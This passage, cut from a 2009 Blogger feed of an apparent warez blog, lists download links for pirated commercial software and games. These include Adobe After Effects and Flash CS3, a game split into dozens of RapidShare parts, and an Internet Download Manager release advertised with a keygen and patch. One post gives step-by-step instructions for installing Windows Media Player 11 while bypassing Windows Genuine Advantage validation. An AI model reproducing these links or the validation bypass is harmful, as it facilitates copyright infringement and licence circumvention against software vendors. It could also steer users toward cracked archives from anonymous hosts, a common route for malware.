href="http://rapidshare.com/files/129552784/Adobe_After_Effects_CS3_mNy90.part1.rar"&gt;http://rapidshare.com/files/129552784/Adobe_After_Effects_CS3_mNy90.part1.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/129553702/Adobe_After_Effects_CS3_mNy90.part2.rar"&gt;http://rapidshare.com/files/129553702/Adobe_After_Effects_CS3_mNy90.part2.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="color:blue;"&gt;Adobe Flash CS3&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(102, 102, 102);"&gt;CREATE AND DELIVER INTERACTIVE CONTENT&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(192, 192, 192);"&gt;&lt;span style="font-family:verdana;"&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;Enjoy a fast, fluid workflow with Adobe® Flash® CS3 Professional software, featuring a streamlined user interface, advanced video tools, and impressive integration with related software.&lt;br /&gt;&lt;br /&gt;Reasons to upgrade&lt;br /&gt;* Animation conversion to ActionScript?&lt;br /&gt;* Adobe interface&lt;br /&gt;* ActionScript 3.0 development&lt;br /&gt;* Advanced debugger&lt;br /&gt;* Adobe Device Central CS3&lt;br /&gt;* Rich drawing capabilities&lt;br /&gt;* User interface components&lt;br /&gt;* Advanced QuickTime export&lt;br /&gt;* Sophisticated video tools&lt;br /&gt;* Timesaving coding tools&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.megaupload.com/?d=H0AYUIDI"&gt;http://www.megaupload.com/?d=H0AYUIDI&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:Verdana;"&gt;&lt;span style="color: rgb(132, 132, 132);"&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="color:blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://rapidshare.com/files/133084174/AFF11.part4.rar"&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-6221975143721290302?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/6221975143721290302/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=6221975143721290302' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/6221975143721290302'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/6221975143721290302'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/03/17-adobe-portable-applications.html' title='14 Adobe Portable Applications!!'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-9080659365211499568</id><published>2009-03-16T06:11:00.000-07:00</published><updated>2009-03-28T00:42:50.414-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Software'/><title type='text'>Crack Windows Media Player 11 Final Bypassing WGA Validation</title><content type='html'>Here are the tutorial to install Window Media Player without validate:&lt;br /&gt;&lt;br /&gt;Step 1:Download Windows Media Player 11 from here:&lt;br /&gt;&lt;a href="http://download.microsoft.com/download/0/9/5/0953E553-3BB6-44B1-8973-106F1B7E5049/wmp11-windowsxp-x86-enu.exe"&gt;Download wmp11-windowsxp-x86-enu.exe&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Step 2:&lt;br /&gt;Extract the contents of &lt;strong&gt;wmp11-windowsxp-x86-enu.exe&lt;/strong&gt;. You can do it with winrar&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_nUlVy6CeF-o/Sb5Z2PAqDpI/AAAAAAAAAHw/2ow26uZzKuI/s1600-h/untitled.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 302px;" src="http://3.bp.blogspot.com/_nUlVy6CeF-o/Sb5Z2PAqDpI/AAAAAAAAAHw/2ow26uZzKuI/s400/untitled.JPG" alt="" id="BLOGGER_PHOTO_ID_5313783398620860050" border="0" /&gt;&lt;/a&gt;a.Now we have our contents extracted to the &lt;strong&gt;wmp11-windowsxp-x86-enu&lt;/strong&gt; folder.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_nUlVy6CeF-o/Sb5bFyFX-xI/AAAAAAAAAH4/onWCeZDjXvs/s1600-h/untitled.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 316px;" src="http://3.bp.blogspot.com/_nUlVy6CeF-o/Sb5bFyFX-xI/AAAAAAAAAH4/onWCeZDjXvs/s400/untitled.JPG" alt="" id="BLOGGER_PHOTO_ID_5313784765245553426" border="0" /&gt;&lt;/a&gt;Step 3:&lt;br /&gt;Open the extracted folder. Run the &lt;strong&gt;wmfdist11.exe&lt;/strong&gt; file.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_nUlVy6CeF-o/Sb5Z1gylfnI/AAAAAAAAAHg/oYS-e3riQiw/s1600-h/u1.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 316px;" src="http://4.bp.blogspot.com/_nUlVy6CeF-o/Sb5Z1gylfnI/AAAAAAAAAHg/oYS-e3riQiw/s400/u1.JPG" alt="" id="BLOGGER_PHOTO_ID_5313783386213809778" border="0" /&gt;&lt;/a&gt;Step 4:&lt;br /&gt;After run &lt;span style="font-weight: bold;"&gt;wmfdist11.exe&lt;/span&gt; file,then run the next file &lt;strong&gt;wmp11.exe&lt;/strong&gt;.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_nUlVy6CeF-o/Sb5Z2Ok5v4I/AAAAAAAAAHo/my3ytFJ7Fug/s1600-h/untitled2.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 313px;" src="http://2.bp.blogspot.com/_nUlVy6CeF-o/Sb5Z2Ok5v4I/AAAAAAAAAHo/my3ytFJ7Fug/s400/untitled2.JPG" alt="" id="BLOGGER_PHOTO_ID_5313783398504447874" border="0" /&gt;&lt;/a&gt;Step 5:&lt;br /&gt;Restart the computer.&lt;br /&gt;&lt;br /&gt;Done.Enjoy your Window Media Player 11&lt;br /&gt;&lt;img src="file:///C:/DOCUME%7E1/WC/LOCALS%7E1/Temp/moz-screenshot.jpg" alt="" /&gt;&lt;img src="file:///C:/DOCUME%7E1/WC/LOCALS%7E1/Temp/moz-screenshot-1.jpg" alt="" /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-9080659365211499568?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/9080659365211499568/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=9080659365211499568' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/9080659365211499568'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/9080659365211499568'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/03/crack-windows-media-player-11-final.html' title='Crack Windows Media Player 11 Final Bypassing WGA Validation'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_nUlVy6CeF-o/Sb5Z2PAqDpI/AAAAAAAAAHw/2ow26uZzKuI/s72-c/untitled.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-2426631344382679256</id><published>2009-03-16T05:18:00.000-07:00</published><updated>2009-03-28T00:42:45.226-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Software'/><title type='text'>Internet download Manager ( IDM )5.15 Full Keygen&amp;Patch</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_nUlVy6CeF-o/Sb5HB9oKJ7I/AAAAAAAAAHQ/e8x5Rq8AWUc/s1600-h/1z6dsg5.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 290px; height: 400px;" src="http://2.bp.blogspot.com/_nUlVy6CeF-o/Sb5HB9oKJ7I/AAAAAAAAAHQ/e8x5Rq8AWUc/s400/1z6dsg5.jpg" alt="" id="BLOGGER_PHOTO_ID_5313762709392205746" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_nUlVy6CeF-o/Sb5HCSTsqqI/AAAAAAAAAHY/Y2Eegyk94p4/s1600-h/2zolsm0.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 211px;" src="http://2.bp.blogspot.com/_nUlVy6CeF-o/Sb5HCSTsqqI/AAAAAAAAAHY/Y2Eegyk94p4/s400/2zolsm0.jpg" alt="" id="BLOGGER_PHOTO_ID_5313762714943531682" border="0" /&gt;&lt;/a&gt;&lt;span style="text-decoration: underline; font-weight: bold; color: rgb(204, 204, 204);"&gt;&lt;span style="line-height: normal;font-size:18;" &gt;Main Features:&lt;/span&gt; &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;• All popular browsers and applications are supported! Internet Download Manager has been tested with the following browsers: Internet Explorer, MSN Explorer, AOL, Netscape Communicator, Netscape 6, Netscape 7, Mozilla, Mozilla Firefox, Mozilla Firebird, Opera, NetCaptor, UltraBrowser, Slim Browser, Avant Browser, MyIE2, Optimal Desktop, Ace Explorer, Advanced Browser, 27 Tools-in-1 Wichio Browser, WindowSurfer, 550 Access Browser, FineBrowser Freeware, Kopassa Browser, Fast Browser Pro, Enigma Browser, GoSuRF, K-Meleon, Smart Explorer, The Off By One Web Browser, Smartalec Voyager, CrystalPort AppCapture, The Family Browser, XANA Web Browser, Bluto, AutoSurf, 32bit Web Browser, BrowseMan, WrestlingBrowser, Eminem Browser, UltraBrowser, Cygsoft LDAP Browser, and Net M@nager. Internet Download Manager supports all versions of popular browsers, and can be integrated into any 3rd party Internet applications.&lt;br /&gt;• Easy downloading with one click. When you click on a download link in a browser, IDM will take over the download and accelerate it. IDM supports HTTP, FTP, HTTPS and MMS protocols.&lt;br /&gt;• Download Speed Acceleration. Internet Download Manager can accelerate downloads by up to 5 times due to its intelligent dynamic file segmentation technology. Unlike other download managers and accelerators Internet Download Manager segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages to achieve best acceleration performance.&lt;br /&gt;• Download Resume. Internet Download Manager will resume unfinished download from the place where they left off.&lt;br /&gt;• YouTube grabber. Internet Download Manager can grab FLV videos from popular sites like YouTube, MySpaceTV, and Google Video.&lt;br /&gt;• Simple installation wizard. Quick and easy installation program will make necessary settings for you, and check your connection at the end to ensure trouble free installation of Internet Download Manager&lt;br /&gt;• Drag and Drop. You may simply drag and drop links to IDM, and drag and drop downloaded files out of Internet Download Manager.&lt;br /&gt;• Automatic Antivirus checking. Antivirus checking makes your downloads free from viruses and trojans.&lt;br /&gt;• Advanced Browser Integration. When enabled, the feature can be used to catch any download from any application. None of download managers have this feature.&lt;br /&gt;• Built-in Scheduler. Internet Download Manager can connect to the Internet at a set time, download the files you want, disconnect, or shut down your computer when it's done.&lt;br /&gt;• IDM includes web site spider and grabber. IDM downloads all required files that are specified with filters from web sites, for example all pictures from a web site, or subsets of web sites, or complete web sites for offline browsing. It's possible to schedule multiple grabber projects to run them once at a specified time, stop them at a specified time, or run periodically to synchronize changes.&lt;br /&gt;• IDM supports many types of proxy servers. For example, IDM works with Microsoft ISA, and FTP proxy servers.&lt;br /&gt;•IDM supports main authentication protocols: Basic, Negotiate, NTLM, and Keberos. Thus IDM can access many Internet and proxy servers using login name and password.&lt;br /&gt;• Download All feature. IDM can add all downloads linked to the current page. It's easy to download multiple files with this feature.&lt;br /&gt;• Customizable Interface. You may choose the order, and what buttons and columns appear on the main IDM window.&lt;br /&gt;• Download Categories. Internet Download Manager can be used to organize downloads automatically using defined download categories.&lt;br /&gt;• Quick Update Feature. Quick update may check for new versions of IDM and update IDM once per week.&lt;br /&gt;• Download limits. Progressive downloading with quotas feature. The feature is useful for connections that use some kind of fair access policy (or FAP) like Direcway, Direct PC, Hughes, etc.&lt;br /&gt;• IDM is multilingual. IDM is translated to Albanian, Arabic, Azerbaijan, Bosnian, Bulgarian, Chinese, Croatian, Czech, Danish, Dutch, Farsi, French, German, Greek, Hebrew, Hungarian, Italian, Japanese, Korean, Lithuanian, Macedonian, Norwegian, Polish, Portuguese, Romanian, Russian, Serbian, Slovak, Slovenian, Spanish, Thai, Turkish, and Uzbek languages.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;span style="color: rgb(204, 204, 204); font-weight: bold;"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;span style="line-height: normal;font-size:18;" &gt;Features new in version 5.15&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;- Added IDM Download Panel for Firefox and other Mozilla based browsers that appears on top of a web-player when IDM detects a multimedia request from the web-player. IDM download panel is used to download and save audio and video files that are played by the web player. It can be used to download flash videos from sites like YouTube, MySpaceTV, Google Videos, etc.&lt;br /&gt;- Made a workaround for a problem with downloading attachments from different yahoo servers&lt;br /&gt;- Enhanced processing of downloads for different types of servers&lt;br /&gt;- Also this version includes all latest bug fixes&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(204, 204, 204);"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;span style="line-height: normal;font-size:18;" &gt;Dowload:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/162684893/I.D.M.v5.15.Full.rar"&gt;http://rapidshare.com/files/162684893/I.D.M.v5.15.Full.rar&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_nUlVy6CeF-o/Sb5D4lmCJaI/AAAAAAAAAHI/RPquPaYyNNA/s1600-h/250qkur.jpg"&gt;&lt;br /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-2426631344382679256?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/2426631344382679256/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=2426631344382679256' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/2426631344382679256'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/2426631344382679256'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/03/main-features-all-popular-browsers-and.html' title='Internet download Manager ( IDM )5.15 Full Keygen&amp;Patch'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_nUlVy6CeF-o/Sb5HB9oKJ7I/AAAAAAAAAHQ/e8x5Rq8AWUc/s72-c/1z6dsg5.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-3081161677186966310</id><published>2009-03-16T05:11:00.000-07:00</published><updated>2009-03-28T00:43:53.766-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Games'/><title type='text'>Prince Of Persia (2008)</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_nUlVy6CeF-o/Sb5CMuRFUhI/AAAAAAAAAG4/uSbinQh1kmw/s1600-h/dfba6ea3.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 283px; height: 400px;" src="http://4.bp.blogspot.com/_nUlVy6CeF-o/Sb5CMuRFUhI/AAAAAAAAAG4/uSbinQh1kmw/s400/dfba6ea3.jpg" alt="" id="BLOGGER_PHOTO_ID_5313757396689310226" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;span style="color:orange;"&gt;&lt;span style="line-height: normal;font-size:18;" &gt;&lt;br /&gt;2x2GB Files&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;table align="center" border="0" cellpadding="3" cellspacing="1" width="90%"&gt; &lt;tbody&gt;&lt;tr&gt; &lt;td&gt;&lt;span class="genmed"&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;Code&lt;/span&gt;:&lt;br /&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td class="code"&gt;&lt;a href="http://rapidshare.com/files/194722617/PrinceOfPersia2008.part1.rar"&gt;http://rapidshare.com/files/194722617/PrinceOfPersia2008.part1.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194453267/PrinceOfPersia2008.part2.rar"&gt;http://rapidshare.com/files/194453267/PrinceOfPersia2008.part2.rar&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;span style="color:orange;"&gt;&lt;span style="line-height: normal;font-size:18;" &gt;18x200MB Files&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;table align="center" border="0" cellpadding="3" cellspacing="1" width="90%"&gt; &lt;tbody&gt;&lt;tr&gt; &lt;td&gt;&lt;span class="genmed"&gt;&lt;strong&gt;Code:&lt;/strong&gt;&lt;/span&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td class="code"&gt;&lt;a href="http://rapidshare.com/files/195308520/Princeofpresia_2008.part01.rar"&gt;http://rapidshare.com/files/195308520/Princeofpresia_2008.part01.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/195308528/Princeofpresia_2008.part02.rar"&gt;http://rapidshare.com/files/195308528/Princeofpresia_2008.part02.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/195308527/Princeofpresia_2008.part03.rar"&gt;http://rapidshare.com/files/195308527/Princeofpresia_2008.part03.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/195308521/Princeofpresia_2008.part04.rar"&gt;http://rapidshare.com/files/195308521/Princeofpresia_2008.part04.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/195308525/Princeofpresia_2008.part05.rar"&gt;http://rapidshare.com/files/195308525/Princeofpresia_2008.part05.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/195329801/Princeofpresia_2008.part06.rar"&gt;http://rapidshare.com/files/195329801/Princeofpresia_2008.part06.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/195329878/Princeofpresia_2008.part07.rar"&gt;http://rapidshare.com/files/195329878/Princeofpresia_2008.part07.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/195329906/Princeofpresia_2008.part08.rar"&gt;http://rapidshare.com/files/195329906/Princeofpresia_2008.part08.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/195330152/Princeofpresia_2008.part09.rar"&gt;http://rapidshare.com/files/195330152/Princeofpresia_2008.part09.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/195330151/Princeofpresia_2008.part10.rar"&gt;http://rapidshare.com/files/195330151/Princeofpresia_2008.part10.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/195348762/Princeofpresia_2008.part11.rar"&gt;http://rapidshare.com/files/195348762/Princeofpresia_2008.part11.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/195348892/Princeofpresia_2008.part12.rar"&gt;http://rapidshare.com/files/195348892/Princeofpresia_2008.part12.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/195348911/Princeofpresia_2008.part13.rar"&gt;http://rapidshare.com/files/195348911/Princeofpresia_2008.part13.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/195349056/Princeofpresia_2008.part14.rar"&gt;http://rapidshare.com/files/195349056/Princeofpresia_2008.part14.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/195349071/Princeofpresia_2008.part15.rar"&gt;http://rapidshare.com/files/195349071/Princeofpresia_2008.part15.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/195365069/Princeofpresia_2008.part16.rar"&gt;http://rapidshare.com/files/195365069/Princeofpresia_2008.part16.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/195365207/Princeofpresia_2008.part17.rar"&gt;http://rapidshare.com/files/195365207/Princeofpresia_2008.part17.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/195365215/Princeofpresia_2008.part18.rar"&gt;http://rapidshare.com/files/195365215/Princeofpresia_2008.part18.rar&lt;br /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;span style="color:orange;"&gt;&lt;span style="line-height: normal;font-size:18;" &gt;35x100MB Files&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;table align="center" border="0" cellpadding="3" cellspacing="1" width="90%"&gt; &lt;tbody&gt;&lt;tr&gt; &lt;td&gt;&lt;span class="genmed"&gt;&lt;strong&gt;Code:&lt;/strong&gt;&lt;/span&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td class="code"&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194541350/Princeofpersia_2008.part01.rar"&gt;http://rapidshare.com/files/194541350/Princeofpersia_2008.part01.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194541348/Princeofpersia_2008.part02.rar"&gt;http://rapidshare.com/files/194541348/Princeofpersia_2008.part02.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194541352/Princeofpersia_2008.part03.rar"&gt;http://rapidshare.com/files/194541352/Princeofpersia_2008.part03.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194548814/Princeofpersia_2008.part04.rar"&gt;http://rapidshare.com/files/194548814/Princeofpersia_2008.part04.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194548823/Princeofpersia_2008.part05.rar"&gt;http://rapidshare.com/files/194548823/Princeofpersia_2008.part05.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194548830/Princeofpersia_2008.part06.rar"&gt;http://rapidshare.com/files/194548830/Princeofpersia_2008.part06.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194555312/Princeofpersia_2008.part07.rar"&gt;http://rapidshare.com/files/194555312/Princeofpersia_2008.part07.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194556368/Princeofpersia_2008.part08.rar"&gt;http://rapidshare.com/files/194556368/Princeofpersia_2008.part08.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194556390/Princeofpersia_2008.part09.rar"&gt;http://rapidshare.com/files/194556390/Princeofpersia_2008.part09.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194556400/Princeofpersia_2008.part10.rar"&gt;http://rapidshare.com/files/194556400/Princeofpersia_2008.part10.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194562804/Princeofpersia_2008.part11.rar"&gt;http://rapidshare.com/files/194562804/Princeofpersia_2008.part11.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194563906/Princeofpersia_2008.part12.rar"&gt;http://rapidshare.com/files/194563906/Princeofpersia_2008.part12.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194563913/Princeofpersia_2008.part13.rar"&gt;http://rapidshare.com/files/194563913/Princeofpersia_2008.part13.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194563951/Princeofpersia_2008.part14.rar"&gt;http://rapidshare.com/files/194563951/Princeofpersia_2008.part14.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194571148/Princeofpersia_2008.part15.rar"&gt;http://rapidshare.com/files/194571148/Princeofpersia_2008.part15.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194572347/Princeofpersia_2008.part16.rar"&gt;http://rapidshare.com/files/194572347/Princeofpersia_2008.part16.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194572363/Princeofpersia_2008.part17.rar"&gt;http://rapidshare.com/files/194572363/Princeofpersia_2008.part17.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194572435/Princeofpersia_2008.part18.rar"&gt;http://rapidshare.com/files/194572435/Princeofpersia_2008.part18.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194579921/Princeofpersia_2008.part19.rar"&gt;http://rapidshare.com/files/194579921/Princeofpersia_2008.part19.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194581073/Princeofpersia_2008.part20.rar"&gt;http://rapidshare.com/files/194581073/Princeofpersia_2008.part20.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194581127/Princeofpersia_2008.part21.rar"&gt;http://rapidshare.com/files/194581127/Princeofpersia_2008.part21.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194581219/Princeofpersia_2008.part22.rar"&gt;http://rapidshare.com/files/194581219/Princeofpersia_2008.part22.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194723147/Princeofpersia_2008.part23.rar"&gt;http://rapidshare.com/files/194723147/Princeofpersia_2008.part23.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194723193/Princeofpersia_2008.part24.rar"&gt;http://rapidshare.com/files/194723193/Princeofpersia_2008.part24.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194723199/Princeofpersia_2008.part25.rar"&gt;http://rapidshare.com/files/194723199/Princeofpersia_2008.part25.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194723197/Princeofpersia_2008.part26.rar"&gt;http://rapidshare.com/files/194723197/Princeofpersia_2008.part26.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194737690/Princeofpersia_2008.part27.rar"&gt;http://rapidshare.com/files/194737690/Princeofpersia_2008.part27.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194737698/Princeofpersia_2008.part28.rar"&gt;http://rapidshare.com/files/194737698/Princeofpersia_2008.part28.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194737733/Princeofpersia_2008.part29.rar"&gt;http://rapidshare.com/files/194737733/Princeofpersia_2008.part29.rar&lt;/a&gt;&lt;br /&gt;&lt;a 